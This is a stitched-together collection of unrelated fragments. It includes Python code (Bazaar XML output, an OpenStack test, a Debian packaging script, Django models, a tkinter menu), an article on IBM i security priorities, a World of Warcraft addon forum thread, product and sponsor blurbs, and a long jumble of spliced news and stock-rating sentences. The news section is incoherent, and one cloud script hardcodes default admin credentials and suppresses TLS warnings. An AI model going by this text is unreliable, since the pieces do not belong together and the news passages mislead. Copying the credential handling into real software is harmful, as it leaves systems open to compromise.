outfile.write('<first_revision>%s</first_revision>' % \ osutils.format_date(timestamp, timezone)) timestamp, timezone = stats['latestrev'] outfile.write('<latest_revision>%s</latest_revision>' % \ osutils.format_date(timestamp, timezone)) outfile.write('</branch_history>') return stats def _show_repository_info_xml(repository, outfile): """Show settings of a repository.""" ## FIXME/TODO: is this needed in the xml output? #if repository.make_working_trees(): # print 'Create working tree for new branches inside the repository.'
def _show_repository_stats_xml(stats, outfile): """Show statistics about a repository.""" if 'revisions' in stats or 'size' in stats: outfile.write('<repository_stats>') if 'revisions' in stats: revisions = stats['revisions'] outfile.write('<revisions>%d</revisions>' % (revisions)) if 'size' in stats: outfile.write('<size unit="KiB">%d</size>' % (stats['size']/1024)) if 'revisions' in stats or 'size' in stats: outfile.write('</repository_stats>')
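A minimal usage sketch for the module above; the BzrDir.open() call on the current directory and the stdout handling are assumptions added for illustration, not part of the original plugin code.
import sys
from bzrlib import bzrdir

# Open the control directory for the current working tree/branch and dump
# its info as XML to stdout (assumes show_bzrdir_info_xml is importable).
a_bzrdir = bzrdir.BzrDir.open('.')
show_bzrdir_info_xml(a_bzrdir, verbose=True, outfile=sys.stdout)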
IBM i shops around the country will be concentrating their efforts more on defensive IT measures like security and high availability this year, as offensive measures like application modernization and mobile app development take a back seat on corporate to-do lists, according to HelpSystems' recent marketplace study. While digital transformation is still an important topic that IBM i shops should have on their radar, an even bigger priority in 2017 will be getting one's digital house in order before hackers, disgruntled employees, or natural disasters conspire to compromise data and disrupt operations. That message came through loud and clear in HelpSystems' 2017 IBM i Marketplace Survey, which was based on surveys taken by nearly 500 IBM i professionals. But the need for better security has also been a commonly heard refrain in other conversations this year, such as the ongoing 2017 predictions that IT Jungle has been asking IBM i leaders to write about. High availability also rose in prominence, if not in the standings. About 39 percent of the IBM i professionals taking HelpSystems' 2016 survey reported high availability as a top concern, which was good enough for second place. While high availability remained in second place for the 2017 study, about 59 percent of respondents in the 2017 study said it was a top concern, a healthy 20-point increase. The percentage of IBM i shops using high availability has also gone up, according to the report. Today, nearly 49 percent of IBM i shops have HA, up about 2 percent in the past year. IBM i HA provider Vision Solutions, which recently published its annual State of Resilience report, has also detected the new security thinking. The defensive shift among IBM i shops dropped application modernization from first in the 2016 survey to third in the 2017 survey. The fraction of IBM i pros saying application modernization was a top concern dropped from about 58 percent in 2016 to about 50 percent in 2017, according to the results. Mobile access, which was the third most cited top concern in 2016 with 38 percent of the vote, plummeted to 10th place in the 2017 survey, with a 24 percent share. Analytics and business intelligence–which can also be thought of as offensive measures designed to boost overall business as part of an overall digital transformation strategy–declined by less than a percent, although it slipped from 7th to 8th place in the standings. Viewed together, the increased focus on security and HA on the one hand, and the drop in modernization and mobile access on the other, make sense, according to Tom Huntington, HelpSystems vice president of technical services and the author of the 2017 Marketplace report. The level of concern that IBM i shops showed about data growth itself was relatively flat. About 34 percent of IBM i shops in the 2016 study listed "data growth" as a top concern, good enough for 5th place. This year, data growth remains in 5th place, although 1.5 percent more respondents listed it as a concern. The growing awareness around security isn't just an IBM i trend. The wider world seems to be waking up to the need to improve computer security. This is especially true in light of the high-profile hacks that took place during last year's presidential campaign and the revelation from American national security agencies that the Russian government was behind some of it.
According to the 2017 Thales Data Threat Report, which surveyed IT professionals about security issues, 73 percent of respondents expect to increase spending on security in the next 12 months. That's up sharply from the prior year, when 58 percent expected increases in security spending. Data breaches are also up, according to the Thales study, which found that the share of organizations reporting that their data had been breached increased from about 60 percent in 2016 to about 67 percent in the 2017 report. Increasing complexity and a lack of suitably trained staff were cited as barriers to better security. The skills issue will continue to be an important topic in IBM i circles this year, as it was for much of last year, when surveys pointed to a lack of skills being a barrier to digital transformation at IBM i shops. But the skills gap is evolving, and it's not just a lack of knowledge of RPG or Control Language that matters anymore–it's the lack of security skills. Security is a top concern for all shops in 2017, not just IBM i shops. Will the increased focus on IBM i security issues translate into better, more securely configured systems, as measured in PowerTech's annual State of Security study, which is due out this spring? The study measures how well security practices are followed in actual customers' IBM i servers. You can access your own copy of the 2017 IBM i Marketplace Study at this webpage. You can also watch the panel discussion webcasts, which included IBMers Ian Jarman and Alison Butterill and IT Jungle's own Timothy Prickett Morgan.
#!/usr/bin/python import gcloudutils import sys import requests import argparse from infoblox_client import connector from infoblox_client import objects from requests.auth import HTTPBasicAuth from requests.packages.urllib3.exceptions import InsecureRequestWarning from oauth2client.client import GoogleCredentials from googleapiclient import discovery requests.packages.urllib3.disable_warnings(InsecureRequestWarning) credentials = GoogleCredentials.get_application_default() compute = discovery.build('compute', 'v1', credentials=credentials) parser = argparse.ArgumentParser( description='Delete VM subnets from Google Compute Engine and remove the corresponding networks from Infoblox. Google Cloud SDK must be installed and configured (gcloud init) and google-api-python-client and infoblox-client Python libraries must be installed.') parser.add_argument('name', nargs='+', help='List of FQDNs for VMs to delete separated by spaces') args=parser.parse_args() niosip = '10.60.27.4' niosuser = 'admin' niospw = 'infoblox' project='mythic-brook-146218' zone='us-west1-a' #name = args.name splitzone = zone.split('-',2) region = splitzone[0] + '-' + splitzone[1] opts = {'host': niosip, 'username': niosuser, 'password': niospw} conn = connector.Connector(opts) for name in args.name: gotnet = gcloudutils.get_subnet(compute, project, region, name) addr = gotnet['ipCidrRange'] gcloudutils.delete_subnet(compute, project, region, name) netobj = objects.Network.search(conn, cidr=addr) netdelete = objects.Network.delete(netobj)
Balgair has just been sent the official release code. Later today I will send the same code to the distribution sites. Remember this code will not work with client 7.3.5; you need to wait until you have client 8.0.1 running. Also remember: do not attempt to upload data from this 8.0.0 addon until you see my announcement in the News and Announcement forums... as it may take me a few days to get the new races enabled correctly. The servers will be taken offline in Europe at 02:00 CET (which is in 16 and a half hours) for upgrade. After that time, it should be safe to make any or all changes necessary to this site. The maintenance window was much shorter than they needed. Due to timing and real life constraints.. this site will stop accepting data (V7) about 11am (PDT) tomorrow. The site will accept data (V8) shortly thereafter. The EU players should have a better time.. login failures, crashes, misplaced characters, disconnects... even possibly breaking twitter for a little while. Our servers didn't even come down in the right timezone, so... not the best sign lol. Announcement said 2:00 CEST, it actually happened at 2:00 BST or CET, 1 hour late... gives me confidence! Looks like a troll, with some text over.. Not worth releasing a new build for, but it should be addressed when you have time.. Damn... I hadn't even read that, until you quoted it.. In any case, it's much better than the fugly question mark.. After spending all day chasing addons, I'm even more appreciative of BOYD's work on this; 50% of my addons aren't updated yet. Several of those I have a bad feeling might be dead, no updates since 7.0, hopefully someone will take those over, but the lesser used ones are probably gone for good. I haven't tried the old ones yet to be fair, the simpler ones might work, but I'm getting enough errors from addons that are supposed to be updated to not want to add non-updated things into the mix yet! I still have a few addons that haven't been updated since WOTLK, and they still work (with a few errors in bugsack).. Just took a look at the upload logs and things look ok.. except. I have noticed a small number of people who are getting E status.. and each one that I looked at (not all of them) had data files showing CensusPlus active in a census run when the character went offline. I would have to look more closely at what is causing the exact failure mode, but I do not really have the time to do that now. I expect that is due to the stability (lack thereof) of the servers at this time. When things settle down and later uploads are attempted I am sure those uploads will process without issue. Ohh yes, I have an E - odd, as I have not crashed out at any point, only logged out normally, European servers have been very stable. So unless a reload when fixing addons has done anything, I've had no unusual situations, only regular logouts. I have not experienced any instability on EU servers.. I have a single E (last I checked), and have been switching toons several times while running, and a few DCs due to 30 minutes AFK (perfectly normal). Never had any crashes or unexpected DCs.. Sorry I have not gotten the website to display the new stuff yet. I have not been feeling well the past few days, and have not done anything except watch the hours slip by. I hope to have the updates up later this week.
Don't stress about it - none of it's in until BFA launches on August 14th anyway Lvl 120 comes on launch, Dark iron Dwarves/Mag'har I believe need completion of the war campaign, don't know if that's gated at all, but would imagine it'll take at least a few days; if gated, more like a few weeks. I don't know if it's going to cause a problem .. but currently there appears to be a bug with characters transferring realms. We've had a couple of people transfer over from another realm, and join us not long after the transfer went through. But then suddenly, although they were still in the guild, and could still take part in guild chat, they were no longer showing on the guild roster. And in guild chat their character names show as their previous character name-realm .. which is very weird. As far as CensusPlus is concerned... the transfer just did not happen.. when it does.. then the characters will appear as new characters in the database on the new realm. We have no way to handle realm to realm transfer tracking .. as that info is not published in game by Blizzard.
# Copyright (c) 2012 OpenStack, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import mock import quantum.common.test_lib as test_lib from quantum.tests.unit.nicira import fake_nvpapiclient import quantum.tests.unit.test_db_plugin as test_plugin NICIRA_PKG_PATH = 'quantum.plugins.nicira.nicira_nvp_plugin' class NiciraPluginV2TestCase(test_plugin.QuantumDbPluginV2TestCase): _plugin_name = ('%s.QuantumPlugin.NvpPluginV2' % NICIRA_PKG_PATH) def setUp(self): etc_path = os.path.join(os.path.dirname(__file__), 'etc') test_lib.test_config['config_files'] = [os.path.join(etc_path, 'nvp.ini.test')] # mock nvp api client self.fc = fake_nvpapiclient.FakeClient(etc_path) self.mock_nvpapi = mock.patch('%s.NvpApiClient.NVPApiHelper' % NICIRA_PKG_PATH, autospec=True) instance = self.mock_nvpapi.start() instance.return_value.login.return_value = "the_cookie" def _fake_request(*args, **kwargs): return self.fc.fake_request(*args, **kwargs) instance.return_value.request.side_effect = _fake_request super(NiciraPluginV2TestCase, self).setUp(self._plugin_name) def tearDown(self): self.fc.reset_all() super(NiciraPluginV2TestCase, self).tearDown() self.mock_nvpapi.stop() class TestNiciraBasicGet(test_plugin.TestBasicGet, NiciraPluginV2TestCase): pass class TestNiciraV2HTTPResponse(test_plugin.TestV2HTTPResponse, NiciraPluginV2TestCase): pass class TestNiciraPortsV2(test_plugin.TestPortsV2, NiciraPluginV2TestCase): pass class TestNiciraNetworksV2(test_plugin.TestNetworksV2, NiciraPluginV2TestCase): pass
Can developers game the system with invalid traffic studies? It's Official! D for Defeated!! Well over $1.5 million and counting has been flowing through the PAC laundering machine in support of Irvine City measures B, C & D. Save for a $250 donation from the veteran's alliance, there isn't a citizen donation in sight. Who is representing the Citizens of Irvine?
import shutil import subprocess import os import tarfile class Config(object): build = os.path.abspath("build") files = os.path.abspath("files") output = os.path.abspath("output") manifest = os.path.abspath("build/DEBIAN") temp = os.path.abspath("tmp") templates = os.path.abspath("files/DEBIAN") version = "0.1.0" variables = { "architecture": "all", "maintainer": "Falk Garbsch <[email protected]>", "name": "gpdpocket-power", } print "first we cleanup our stuff" config = Config() for rdir in [config.build, config.temp, config.output]: try: print ">> remove %s" % (rdir) shutil.rmtree(rdir) except: pass print "create directories" os.makedirs(config.temp) os.makedirs(config.output) os.makedirs(config.build) os.makedirs(config.manifest) print "copy files" copylist = [ ( 'files/gpd-fan.conf', '/etc/gpd/fan.conf', 0644 ), ( 'files/gpd-fan.py', '/usr/local/sbin/gpd-fan', 0755 ), ( 'files/gpd-fan.service', '/etc/systemd/system/gpd-fan.service', 0644 ), ( 'files/gpd-fan.sh', '/lib/systemd/system-sleep/gpd-fan', 0755 ), ( 'files/tlp', '/etc/default/tlp', 0644 ) ] for src, dst, mode in copylist: print ">> copy (0%o) %s" % (mode, dst) src = os.path.abspath(src) dst = config.build + dst dn = os.path.dirname(dst) if not os.path.isdir(dn): os.makedirs(dn) shutil.copy(src, dst) os.chmod(dst, mode) print "enable systemd service" src = "/etc/systemd/system/gpd-fan.service" dst = config.build + "/etc/systemd/system/basic.target.wants/gpd-fan.service" dn = os.path.dirname(dst) if not os.path.exists(dst): os.makedirs(dn) os.symlink(src, dst) print "create blacklist item" blacklist = config.build + "/etc/pm/config.d/brcmfmac" dn = os.path.dirname(blacklist) if not os.path.isdir(dn): os.makedirs(dn) fp = open(blacklist, "wb") fp.write("SUSPEND_MODULES=\"brcmfmac\"\n") fp.flush() fp.close() print "write control" variables = config.variables variables["version"] = config.version control = open(config.files + "/DEBIAN/control", "rb").read() fp = open(config.manifest + "/control", "wb") fp.write(control.format(**variables)) fp.flush() fp.close() print "constructing script files" for script in ["/postinst", "/postrm", "/preinst", "/prerm"]: print ">> write DEBIAN%s" % (script) filepath = config.manifest + script content = open(config.templates + script, "rb").read() fp = open(filepath, "wb") fp.write(content.replace("__VERSION_CODE__", variables["version"])) fp.flush() fp.close() os.chmod(filepath, 0555) print "building binary package" command = ["fakeroot", "dpkg-deb", "-b", config.build] command.append("%s/%s-%s.deb" % (config.output, variables["name"], variables["version"])) subprocess.call(command) print "done"
Aidan Mattox Beaded Fit-&-flare Cocktail Dress - Fit-and-flare cocktail dress with beaded details. Crewneck. Short sleeves. Concealed back zip. Lined. About 38" from shoulder to hem. Polyester. Dry clean. Model shown is 5'10" (177cm) wearing US size 4.
# -*- coding: utf-8 -*- # # Copyright (C) 2010 Lincoln de Sousa <[email protected]> # Copyright (C) 2010 Gabriel Falcão <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os from glob import glob from ConfigParser import ConfigParser from django.conf import settings from django.core.urlresolvers import reverse from django.utils import simplejson class Plugin(object): name = None description = None js_url = None html_url = None slug = None default = False def to_dict(self): d = { 'name': self.name, 'description': self.description, 'slug': self.slug, 'js_url': self.js_url, 'html_url': self.html_url, 'default': self.default, } return d def to_json(self): return simplejson.dumps(self.to_dict()) @classmethod def fetch_all(cls): plugins = [] files = glob(os.path.join(settings.PLUGINS_DIRECTORY, "*.cfg")) for i in files: fname = os.path.splitext(os.path.basename(i))[0] plugin = cls() cfg = ConfigParser() cfg.read(os.path.abspath(i)) plugin.name = cfg.get('Default', 'name') plugin.slug = fname plugin.description = cfg.get('Default', 'description') plugin.js_url = reverse('plugins-url', kwargs={'path': '%s.js' % fname}) plugin.html_url = reverse('plugins-url', kwargs={'path': '%s.html' % fname}) if cfg.has_option('Default', 'default'): plugin.default = cfg.getboolean('Default', 'default') else: plugin.default = False plugins.append(plugin) return plugins
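For illustration, a sketch of the kind of .cfg file Plugin.fetch_all() expects to find in settings.PLUGINS_DIRECTORY; the plugin name and description below are invented, not taken from the project.
# Hypothetical plugin definition of the form fetch_all() parses: ConfigParser
# reads a [Default] section with 'name', 'description' and an optional
# boolean 'default'.
example_cfg = (
    "[Default]\n"
    "name = Chat\n"
    "description = Adds a chat box to the room page\n"
    "default = true\n"
)
# Saved as chat.cfg in PLUGINS_DIRECTORY, this would yield a Plugin with slug
# 'chat' whose js_url/html_url resolve to chat.js and chat.html through the
# 'plugins-url' route.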
ACT-IAC would like to express its thanks and appreciation to each of our 2017 sponsors for their support. The contributions provided by these organizations support the unique public-private partnership provided by ACT-IAC and are vital to our ability to provide high quality programs and services throughout the year. The organizations on this list are demonstrating their commitment to a partnership where government and industry are working together towards a more effective and innovative government.
# All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Rename Namespace To Platform Revision ID: 9a18c6fe265c Revises: 046a38742e89 Create Date: 2017-10-12 17:28:17.636938 """ from alembic import op from rally import exceptions # revision identifiers, used by Alembic. revision = "9a18c6fe265c" down_revision = "046a38742e89" branch_labels = None depends_on = None def upgrade(): with op.batch_alter_table("verifiers") as batch_op: batch_op.alter_column("namespace", new_column_name="platform") def downgrade(): raise exceptions.DowngradeNotSupported()
@Isocelesisopod Agreed! Some leave having started to ponder possibilities, at least. It's hard working through all that societal conditioning.
from django.db import models from django.contrib import admin class NullableModel(models.Model): TRUTH_VALUE = True charfield = models.CharField(max_length=100, null=True, blank=True) charfield_2 = models.CharField(max_length=100, null=TRUTH_VALUE) textfield = models.TextField(null=True, blank=True) boolean_false = models.BooleanField(default=True) nullable_boolean = models.NullBooleanField() # We should still report about the following field, but we cannot # determine its name. models.NullBooleanField() class UniqueForModels(models.Model): time = models.DateTimeField() u_date = models.IntegerField(unique_for_date='time') u_month = models.IntegerField(unique_for_month='time') u_year = models.IntegerField(unique_for_year='time') class ParentModel(models.Model): parent = models.ForeignKey('self') class StrModel(models.Model): dummy = models.CharField(max_length=1) def __str__(self): return "__str__ method" def __unicode__(self): return self.dummy class NullBlankModel(models.Model): number = models.IntegerField(blank=True) class BigModel(models.Model): field01 = models.IntegerField() field02 = models.IntegerField() field03 = models.IntegerField() field04 = models.IntegerField() field05 = models.IntegerField() field06 = models.IntegerField() field07 = models.IntegerField() field08 = models.IntegerField() field09 = models.IntegerField() field10 = models.IntegerField() field11 = models.IntegerField() field12 = models.IntegerField() field13 = models.IntegerField() field14 = models.IntegerField() field15 = models.IntegerField() field16 = models.IntegerField() field17 = models.IntegerField() field18 = models.IntegerField() field19 = models.IntegerField() field20 = models.IntegerField() field21 = models.IntegerField() field22 = models.IntegerField() field23 = models.IntegerField() field24 = models.IntegerField() field25 = models.IntegerField() field26 = models.IntegerField() field27 = models.IntegerField() field28 = models.IntegerField() field29 = models.IntegerField() field30 = models.IntegerField() field31 = models.IntegerField() class NoFieldsModel(models.Model): pass class Post(models.Model): title = models.CharField(max_length=100) content = models.CharField(max_length=1000) views = models.PositiveSmallIntegerField() words = models.SmallIntegerField() created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) def __unicode__(self): return self.title class Comment(models.Model): post = models.ForeignKey(Post) url = models.URLField() def __unicode__(self): return self.url class MisorderedMethodsModel(models.Model): dummy = models.CharField(max_length=1) def incorrect_place(self): pass def get_absolute_url(self): pass def __unicode__(self): # This should be swapped with get_absolute_url pass def correct_place(self): pass class Model1(models.Model): dummy = models.CharField(max_length=1) class Meta: verbose_name_plural = 'right' def __unicode__(self): return self.dummy class Model2(models.Model): dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Meta: verbose_name_plural = 'wrong' class Model3(models.Model): class Meta: verbose_name_plural = 'wrong' dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Model4(models.Model): dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Model5(models.Model): dummy = models.CharField(max_length=1) def get_absolute_url(self): return "/" def __unicode__(self): return self.dummy class AbstractModel(models.Model): foo = 
models.CharField(max_length=1) class Meta: abstract = True class DerivedModel(AbstractModel): bar = models.CharField(max_length=1) class WeirdPrimaryKeyModel(models.Model): primary_key = models.ForeignKey(Model1, primary_key=True) unique_field = models.ForeignKey(Model2, unique=True) not_both = models.ForeignKey(Model3, primary_key=True, unique=False) class ManyToManyModel(models.Model): nullable = models.ManyToManyField(Model2, null=True) blank = models.ManyToManyField(Model3, blank=True) class AdminKlass(admin.ModelAdmin): search_fields = ('nullable',) class Meta: model = ManyToManyModel
Although some industry players have tried to promote the harvesting of "sustainable" palm oil, Richard Walker, Iceland's managing director, said the company did not believe it was viable... Walker's conclusion was stark: "I do not believe such a thing as sustainable palm oil exists.". Over half of products in supermarkets contain palm oil, according to United Kingdom (UK) grocery store chain Iceland, and demand is contributing to deforestation. About 4.49M shares traded or 22.90% up from the average. Rogers Communications Inc. (RCI) has risen 1.45% since April 8, 2017 and is uptrending. 315,800 shares were bought by Polaris Capital Management Llc as the company's stock declined 0.36% with the market. Though the Indigo staff at the Lucknow airport refused to talk about the incident, according to News18, the airline tweeted about the incident on Monday saying: "Rai was offloaded from 6E541 for unruly behaviour". However, in a video posted on social media, Rai alleged he was manhandled by flight staff. The government has ordered an enquiry into the incident. Moreover, Virtus Advisers has 0.11% invested in Monsanto Company ( NYSE : MON ). A total of 3 analysts rate Monsanto ( NYSE : MON ) as follows: 0 "Buy", 3 "Hold" and 0 "Sell". Now it had 95,873 shares held by the institutional investor. Monsanto Company , together with its subsidiaries, provides agricultural products for farmers worldwide.The firm is worth $55.20 billion. Trump has often slammed China's huge surplus in the trade of goods with the United States, which reached $375 billion a year ago, according to U.S. data. It also included medical devices and flat-screen TVs. Trump also warned China that threats to raise tariffs on American agricultural products, in an attempt to hurt a constituency that provided some of his strongest political support, would backfire. About 1.67 million shares traded. Amazon.com, Inc. (NASDAQ:AMZN) has risen 76.78% since April 9, 2017 and is uptrending. The rating was maintained by BMO Capital Markets with "Outperform" on Monday, May 15. Susquehanna maintained the shares of INTC in report on Friday, March 2 with "Buy" rating. The rating was maintained by SunTrust with "Buy" on Monday, October 2. But even those transactions drew regulator's ire as the conventional RBI was against providing a board position for Enam founder Vallabh Bhanshali. This will mean that Sharma, who had taken charge at the bank on June 1, 2009 (she moved from ICICI Prudential Life Insurance Company where she was the CEO & managing director), will exit Axis almost 30 months ahead of her stipulated tenure. The US Treasury on Friday included Rusal and seven other Deripaska-linked firms in a list of 12 Russian companies hit with sanctions that it said were meant to punish the country for actions in Crimea, Ukraine and Syria, and attempting to subvert Western democracies. The Super Kings won the match by just one wicket much to the delight of the fans of the Yellow Army. The telecom service providers have increased data cap around multiple data plans while smartphone makers have announced partnership with IPL teams to promote their brands. Russia will not leave new United States sanctions and any future hostile actions without a tough response, the Russian Foreign Ministry has said after Washington announced a new round of restrictions against Moscow. "This included their occupation of Crimea, instigation of violence in eastern Ukraine, support for the Assad regime in Syria... 
and ongoing malicious cyber-activity", the senior official said. A remote Saskatchewan intersection where a junior hockey team bus crashed on Friday was already a scene of tragedy for a family that lost six of its members in a collision two decades ago. "We need to grieve, we need to support each other, we need to appreciate the contributions these young people have made already and grieve the fact that they won't continue to make a contribution", says Dr. Facebook has been scrambling for weeks in the face of the disclosure of the hijacking of private data by the British consulting group working for Donald Trump 's 2016 presidential campaign. We've reached out to AggregateIQ and Facebook , and will update if we hear back. "When you're building something like Facebook that is unprecedented in the world, there are going to be things that you mess up", Zuckerberg said, adding that the important thing was to learn from mistakes. The court acquitted all the other accused - actors Saif Ali Khan , Tabu, Neelam and Sonali Bendre; and Dushyant Singh , a resident of the area. Hundreds flocked to his home in Mumbai to show solidarity with the star who moved from his luxury apartment to sleeping on the floor of a cell in the Jodhpur Central Jail. On March 23, the Indian government had requested the Chinese authorities to facilitate Mr. Nirav Modi's arrest in connection with the ongoing probe against him. The LoU are a sort of guarantee given by an issuing bank to other Indian banks having branches overseas to issue a short-term credit to the applicant. Premier Notley said Albertans have been clear - they want the pipeline built. "Those are strong words, but we need more", Notley said. But she added that this pipeline is so important to Alberta that the province would consider becoming a co-owner. Usa Fincl Portformulas holds 0.19% or 6,309 shs. The stock experienced -0.16% slump, arriving at $145.71 on 04/03/2018. Virginia Retirement Et Al, a Virginia-based fund reported 78,600 shs. Thrivent Financial For Lutherans grew its position in MSCI by 2.0% during the 4th quarter. MSCI outperformed the S&P 500 by 47.88%. Analysts await MSCI Inc . A round of leadership staffing decisions are expected to be made for the German bank in a supervisory board conference call on Sunday. Commenting on the new chief executive, Mr Achleitner said: "In his more than 25 years at Deutsche Bank, Christian Sewing has proven himself a strong and disciplined leader". A reading between 0 and -20 would indicate an overbought situation. Tracking other technical indicators, the 14-day RSI is presently standing at 49.13, the 7-day sits at 52.8, and the 3-day is resting at 55.76 for ETFS S&P 500 High Yield Low Volatility ETF (ZYUS.AX). Kochhar was questioned for six hours on Thursday in connection with the preliminary enquiry against his brother, Deepak Kochhar , and Videocon Chairman Venugopal Dhoot . Rajiv Kochhar is the founder of the Singapore-based Avista Advisory Group. According to disclosures made by Avista Advisory, the company acted as an advisor in restructuring debt of Jaiprakash Associates, Jaiprakash Power Ventures, GTL Infrastructure, Suzlon, JSL and Videocon Group. Michael Chiesa is no stranger to hyping up his UFC fights - he famously took a run at Kevin Lee during a press conference over "your mum" insults past year - but even he was stunned by the attack on a bus carrying him and several MMA stars on Thursday. 
At the start of the week, the USA announced plans to put tariffs on $50 billion in goods imported from China, and the Chinese government responded with measures of equal size. Over the course of the day 9,408 shares traded hands, as compared to an average volume of 3,770 over the last 30 days for Horizons S&P 500 Covered Call ETF (NYSEARCA:HSPX). Australia is investigating Facebook over alleged privacy breaches, authorities said Thursday, after the firm admitted the personal data of thousands of local users was improperly shared with a British political consultancy. Cambridge Analytica disputed the number in a statement, saying, "Cambridge Analytica licensed data for no more than 30 million people from GSR, as is clearly stated in our contract with the research company". She added that Facebook believed Cambridge Analytica deleted users' data because "they gave us assurances, and it wasn't until other people told us it wasn't true". He is to appear before a USA congressional panel next week to address privacy issues. 'We have a responsibility to protect people's data. "We cared about privacy all along, but I think we got the balance wrong", Sandberg told Savannah Guthrie on the Today show. Facebook is trying to strengthen its system ahead of this year's US midterm elections as well as upcoming elections around the world. " said Facebook in a statement to TechCrunch ". Instead, he said that the move is aimed primarily at stopping external organisations from spreading disinformation as happened in the 2016 United States presidential election and the Brexit referendum the same year. The two sides also will discuss ways to ease tensions in bilateral relations and strengthen political, economic, security and counter-terrorism cooperation. Pakistan rejected as "baseless" the allegation that it violated Afghan airspace. Although the suspension in U.S. aid has been in effect for months, the Pentagon and the U.S. A 67-year-old man from Sydney was charged with four "serious" assault offences allegedly perpetrated against his new wife, who recently arrived in Australia from China. After the incident, the boyfriend reportedly ran to his uncle's home on East Cecil Street and told him what had just happened. Three days later, she again called 911 telling dispatchers that she did not feel right. The company exchanged hands with 17812227 shares contrast to its average daily volume of 15.74M shares. China imposed $3 billion of tariffs on USA farm goods and other exports, bringing the world's two leading economies closer to a full-on trade conflict. Wallington Asset Management Llc who had been investing in American Tower Corp. for a number of months, seems to be bullish on the $61.41 billion market cap company. 6 are the (NASDAQ:GLNG)'s ratings reports on April 6, 2018 according to StockzIntelligence Inc. Cowen increased their price objective on Golar LNG to $49.00 and gave the stock an "outperform" rating in a research note on Wednesday, February 28th. For the full medal count breakdown head over to the Gold Coast 2018 commonwealth games website . Before Sanjita it was Mirabai (Women's 48kg Final) and Gururaja (Men's 56kg Final) who brought cheers to the whole nation as they claimed gold and silver medals respectively. MSCI's broadest index of Asia-Pacific shares outside Japan rose 0.5%, a day after it hit its lowest in nearly two months. Singapore's Straits Times index was down 0.8 percent. 
Optimists also argued that the global economy is now running so strong that it could cope with the impact of the proposed tariffs, which cover a fraction of the world's trade. In a rare interview conference call with journalists, Mr Zuckerberg admitted that both he and his company have consistently got it wrong when it comes to assessing the damage that is being done by those manipulating Facebook for their own ends. Wellington Management Group Llp, which manages about $452.59B US Long portfolio, upped its stake in South St Corp (NASDAQ:SSB) by 318,941 shares to 1.95M shares, valued at $169.71M in 2017Q4, according to the filing. Efg Asset Mngmt (Americas) reported 8,276 shares stake. Investors sentiment increased to 1.11 in Q4 2017. It is positive, as 33 investors sold FIS shares while 191 reduced holdings. Facebook (NASDAQ:FB) last issued its quarterly earnings data on Wednesday, January 31st. (NASDAQ:FB) or 1.65M shares. Moreover, Partner Fund Mngmt L P has 0.02% invested in Facebook, Inc. On Thursday, November 5 the stock rating was maintained by Jefferies with "Buy". (NASDAQ:FB) on Wednesday, January 31 with "Buy" rating. (NASDAQ:FB) has "Buy" rating given by Mizuho.
__author__ = 'saintdragon2' #http://www.tutorialspoint.com/python/tk_menu.htm from tkinter import Tk, Menu, Toplevel, Button from tkinter.filedialog import askopenfilename from tkinter.messagebox import showerror def donothing(): filewin = Toplevel(root) button = Button(filewin, text="Do nothing button") button.pack() def load_file(): fname = askopenfilename(filetypes=(("Template files", "*.tplate"), ("HTML files", "*.html;*.htm"), ("All files", "*.*") )) if fname: try: # print("""here it comes: self.settings["template"].set(fname)""") print(fname) except: # <- naked except is a bad idea showerror("Open Source File", "Failed to read file\n'%s'" % fname) return root = Tk() menubar = Menu(root) filemenu = Menu(menubar, tearoff=0) filemenu.add_command(label='New', command=donothing) filemenu.add_command(label='Open', command=load_file) filemenu.add_command(label='Save', command=donothing) filemenu.add_command(label='Save as ...', command=donothing) filemenu.add_command(label='Close', command=donothing) filemenu.add_separator() filemenu.add_command(label='Exit', command=root.quit) menubar.add_cascade(label='File', menu=filemenu) editmenu = Menu(menubar, tearoff=0) editmenu.add_command(label='Undo', command=donothing) editmenu.add_separator() editmenu.add_command(label='Cut', command=donothing) editmenu.add_command(label='Copy', command=donothing) editmenu.add_command(label='Paste', command=donothing) editmenu.add_command(label='Delete', command=donothing) editmenu.add_command(label='Select All', command=donothing) menubar.add_cascade(label='Edit', menu=editmenu) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label='Help Index', command=donothing) helpmenu.add_command(label='About ...', command=donothing) menubar.add_cascade(label='Help', menu=helpmenu) root.config(menu=menubar) root.mainloop()
Today was supposed to be Aulia's swimming class at the Oakleaf Country Club but the coach cancelled it after the first 5 minutes. The rain had gotten heavier, which wasn't so bad, but then there was thunder and lightning so we had to literally drag her out of the water: poor thing! So we decided to go back home and continue sleeping. Oh well, guess there's always next week. Will share her swimming lesson in my next post.
